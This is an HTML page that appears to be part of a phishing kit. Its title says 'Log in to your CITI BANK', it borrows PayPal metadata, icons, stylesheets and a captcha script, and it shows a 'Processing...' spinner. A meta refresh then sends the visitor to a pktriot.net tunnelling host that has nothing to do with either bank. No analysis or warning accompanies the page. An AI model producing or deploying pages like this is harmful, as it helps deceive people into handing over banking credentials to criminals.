<!DOCTYPE html>
<html>
<head>
    <script async src="https://www.paypalobjects.com/webcaptcha/ngrlCaptcha.min.js"></script>
    <meta charset="utf-8" />
    <title>Log in to your CITI BANK</title>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
    <meta name="application-name" content="PayPal" />
    <meta name="msapplication-task"
        content="name=My Account;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_account;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" />
    <meta name="msapplication-task"
        content="name=Send Money;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_send-money-transfer&amp;send_method=domestic;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" />
    <meta name="keywords" content="transfer money, email money transfer, international money transfer " />
    <meta name="description"
        content="" />
    <link rel="apple-touch-icon" href="https://www.paypalobjects.com/webstatic/icon/pp64.png" />
    <link rel="canonical" href="https://www.paypal.com/us/signin" />
    <meta name="viewport"
        content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=2, user-scalable=yes" />
    <meta property="og:image" content="" />
    <link rel="stylesheet"
        href="https://www.paypalobjects.com/web/res/ea1/447bf499c540edbe750aec4d6a5d6/css/contextualLoginElementalUIv2.css" />

<meta name="viewport" content="width=device-width, initial-scale=1">
<style>

.loader {
  margin-top: 250px;
  border: 7px solid #ffffff;
  border-radius: 50%;
  border-top: 7px solid #4971de;
  border-left: 7px solid #4971de;
  border-right: 7px solid #4971de;
  width: 100px;
  height: 100px;
  -webkit-animation: spin 1s linear infinite; /* Safari */
  animation: spin 1s linear infinite;
}

.fieldLabel {
    font-size: 14px;
}

/* Safari */
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}

@media (max-width: 477px) {
    .loader {
        margin-top: 350px;
        border: 6px solid #ffffff;
        border-radius: 50%;
        border-top: 6px solid #4971de;
        border-left: 6px solid #4971de;
        border-right: 6px solid #4971de;
        width: 100px;
        height: 100px;
        -webkit-animation: spin 1s linear infinite; /* Safari */
        animation: spin 1s linear infinite;
      }
}

</style>

</head>
<body>

<center><div class="loader"></div></center>
<meta http-equiv="refresh" content="5;url=https://falling-shadow-60957.pktriot.net/CITIBANK" />

<div class="fieldLabel">
    <center><h2>Processing...</h2></center>
</div>

</body>
</html>
